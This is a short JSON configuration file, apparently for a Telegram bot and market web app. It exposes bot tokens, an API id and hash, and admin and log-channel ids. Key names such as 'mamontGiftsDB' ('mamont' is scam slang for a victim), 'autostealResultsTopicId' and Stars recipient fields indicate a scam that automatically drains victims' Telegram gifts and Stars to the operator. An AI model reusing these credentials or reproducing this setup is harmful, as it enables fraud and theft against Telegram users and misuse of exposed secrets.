{
  "botToken": "8474613762:AAH9rOVh-CWfLc0uq6Gi5dVulnCIo7xriBE",
  "webUrl": "markettochkaapp.bothost.ru",
  "recipientUsername": "wantkillmegod",
  "remainingStarsRecipient": "wantkillmegod",
  "apiId": 30040681,
  "photourl": "https://sun9-79.userapi.com/impg/qzwmEk64oNq3rwFD6oWa80tRR0xNGCMLRo-RAw/lqbv_jdzYFc.jpg?size=640x640&quality=95&sign=1f56833df7329570b118a0a02e4d99eb&type=album",
  "apiHash": "7f252ef7b8d7d37cdc6bc1e2dbf7bb76",
  "marketWebAppUrl": "https://markettochkaapp.bothost.ru",
  "mamontGiftsDB": "mamont-gifts.json",
  "adminId": 7061933770,
  "logGroupId": -1003840463776,
  "logTopicId": 1,
  "autostealResultsTopicId": 1,
  "BOT_TOKEN": "8449178438:AAEM_fTT-JryiNyL4KCUDOOj0woICw7Qv4c",
  "starsChannelId": -11003843109851,
  "starsMessageId": 2
}
